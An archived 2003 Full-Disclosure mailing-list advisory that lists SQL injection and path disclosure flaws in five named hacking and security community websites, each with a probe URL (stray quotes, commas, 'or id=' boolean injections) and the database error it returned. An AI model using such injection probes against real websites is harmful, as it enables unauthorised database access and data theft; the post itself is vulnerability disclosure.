[Full-Disclosure] @(#)Mordred Security Notice - exporing the hacking websites

• Previous message: Georgi Guninski: "Re: [Full-Disclosure] SILLY BEHAVIOR Part III : Internet Explorer 5.5 - 6.0"
• Next in thread: Sir Mordred: "Re: [Full-Disclosure] @(#)Mordred Security Notice - exporing the hacking websites"
• Maybe reply: Sir Mordred: "Re: [Full-Disclosure] @(#)Mordred Security Notice - exporing the hacking websites"
• Maybe reply: Schmehl, Paul L: "RE: [Full-Disclosure] @(#)Mordred Security Notice - exporing the hacking websites"
• Maybe reply: petard_at_hushmail.com: "RE: [Full-Disclosure] @(#)Mordred Security Notice - exporing the hacking websites"
• Maybe reply: Schmehl, Paul L: "RE: [Full-Disclosure] @(#)Mordred Security Notice - exporing the hacking websites"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: full-disclosure@lists.netsys.com
Date: Mon, 05 May 2003 15:58:59 +0000

// @(#)Mordred Labs security notice - exploring the hacking websites

Release date: May 5, 2003
Author: Sir Mordred (mordred@s-mail.com)

I. INTRODUCTION

It is a first security notice about the real state of web app security
with the real world examples. In this issue we will be focusing on websites
related to hacking.
Security companies and news portals will be discussed later.
For now, it would be nice to see the reaction of the community on this
issue.

Looking at this notice, one can clearly see, that the combination of
ASP/PHP and relational database
is a very dangerous, even the "security experts" make mistakes :-).

Surely, not all of the vulnerabilities have been found/disclosed.
For example, there was no testing for CSS vulnerabilities at all.

Note that the vulnerabilities are presented here in the following format:

* ISSUE <number> - description of the vulnerability
blank line
the url to demonstrate this vulnerability
blank line
the error message (if exists)

One last word to tripz: thanks for the help.

II. DETAILS

1) ---------------------- www.progenic.com ------------------------------

It seems that the primary goal of this website, created "for the love of
the scene",
is to maintain a large collection of links to security/hacking resources.

* ISSUE 1 - SQL injection in /vote/default.asp page

http://www.progenic.com/vote/?id=e',s

Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near ','.
/vote/Default.asp, line 154

* ISSUE 2 - SQL injection in /info/default.asp page

http://www.progenic.com/info/default.asp?id=.'

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string '.''.
/info/Default.asp, line 32

2) --------------------- www.hackinthebox.org --------------------------
<quote>
Hack In The Box is designed to facilitate discussions on security related
topics, create security awareness, and to try and provide a comprehensive
database of security knowledge and resources to the public
</quote>

Rather interesting website, the nice thing about it is that HITB opened
source
code of certain parts of the website, i did not bother to look at their
source though.

* ISSUE 1 - SQL injection in /memberlist.php page

http://www.hackinthebox.org/memberlist.php?letter=A&sortby=uname,

1064: You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the
right syntax to use near ' LIKE '%' ORDER BY uname,' at line 1

3) ---------------------- www.hackerscenter.com -----------------------
<quote>
The best resource for hackers and crackers: tons of tools, tutorials,
books, articles, analysis.
Join our Top%0 or enjoy our Online tools!!!
</qoute>

* ISSUE 1 - SQL injection in /top50/default.asp page

http://www.hackerscenter.com/top50/default.asp?id=9,'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (comma) in query
expression 'id=9,''.
/top50/default.asp, line 249

* ISSUE 2 - SQL injection in /downloads/download.asp page

http://www.hackerscenter.com/downloads/download.asp?id=7,&area=HACKING

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (comma) in query
expression 'id=7,'.
/downloads/download.asp, line 37

* ISSUE 3 - SQL injection in /articles/article.asp page

Visiting the url http://www.hackerscenter.com/articles/article.asp?id=28
gives us back their article "Securing Windows".

However, visiting the url
http://www.hackerscenter.com/articles/article.asp?id=28111
gives us back the error page with the message "Exception occured in
/articles/article.asp, line 129".

But visiting
http://www.hackerscenter.com/articles/article.asp?id=28111+or+id=28 gives
us the above article.

* ISSUE 4 - SQL injection in /articles/archive.asp

http://www.hackerscenter.com/articles/archive.asp?searchstring=SQL&field='SU
BJECT

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression
'Validated=True AND 'SUBJECT LIKE '%%%SQL%%%' ORDER BY 'SUBJECT DESC'.
/articles/archive.asp, line 154

4) --------------------------------- www.codeingtheweb.net
---------------------------
<quote>
We deal in security new, security programs and virus alers.
We also have an online messenger system, top50, forum etc. An amazing site!
</quote>

* ISSUE 1 - SQL injection in /top50/index.php page

http://www.codeingtheweb.net/top50/index.php?cid=1'\1

You have an error in your SQL syntax near '\'\\1 order by thin DESC,ranks
DESC,star DESC,thout DESC limit 0,50' at line 1

5) -------------------------------- www.ebcvg.com
-----------------------------------
<quote>
eBCVG.com is a security portal dedicated to providing security
professionals with the
knowledge and resources needed to help protect all of their data.
applications ... etc...
It was developed by IT and security experts to facilitate discussion on
security related topics,
promote security awareness and to provide comprehensive and helpful
database of security.
</quote>

* ISSUE 1 - Path disclosure in /articles.php page

http://www.ebcvg.com/articles.php?id='

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL
result resource in /home/1111146160/www/web/articles.php on line 37
Unabled to read from database.

* ISSUE 2 - SQL injection in /articles.php page

Visiting the url http://www.ebcvg.com/articles.php?id=126 gives us back the
article "Copying Copy Protected CD's".

However, visiting the http://www.ebcvg.com/articles.php?id=12611 gives us
the page
with the error message "Unabled to read from database".

But the url http://www.ebcvg.com/articles.php?id=12611+or+id=126 gives us
the above article.

* ISSUE 3 - Path disclosure in /download.php

http://www.ebcvg.com/download.php?id='

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL
result resource in /home/1111146160/www/web/download.php on line 7
Warning: Cannot add header information - headers already sent by (output
started at /home/1111146160/www/web/download.php:7) in
/home/1111146160/www/web/download.php on 12

* ISSUE 4 - SQL injection in /download.php

This is almost identical to the issue 2, only the url is
http://www.ebcvg.com/download.php?id= number>

________________________________________________________________________
This letter has been delivered unencrypted. We'd like to remind you that
the full protection of e-mail correspondence is provided by S-mail
encryption mechanisms if only both, Sender and Recipient use S-mail.
Register at S-mail.com: http://www.s-mail.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

• Previous message: Georgi Guninski: "Re: [Full-Disclosure] SILLY BEHAVIOR Part III : Internet Explorer 5.5 - 6.0"
• Next in thread: Sir Mordred: "Re: [Full-Disclosure] @(#)Mordred Security Notice - exporing the hacking websites"
• Maybe reply: Sir Mordred: "Re: [Full-Disclosure] @(#)Mordred Security Notice - exporing the hacking websites"
• Maybe reply: Schmehl, Paul L: "RE: [Full-Disclosure] @(#)Mordred Security Notice - exporing the hacking websites"
• Maybe reply: petard_at_hushmail.com: "RE: [Full-Disclosure] @(#)Mordred Security Notice - exporing the hacking websites"
• Maybe reply: Schmehl, Paul L: "RE: [Full-Disclosure] @(#)Mordred Security Notice - exporing the hacking websites"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]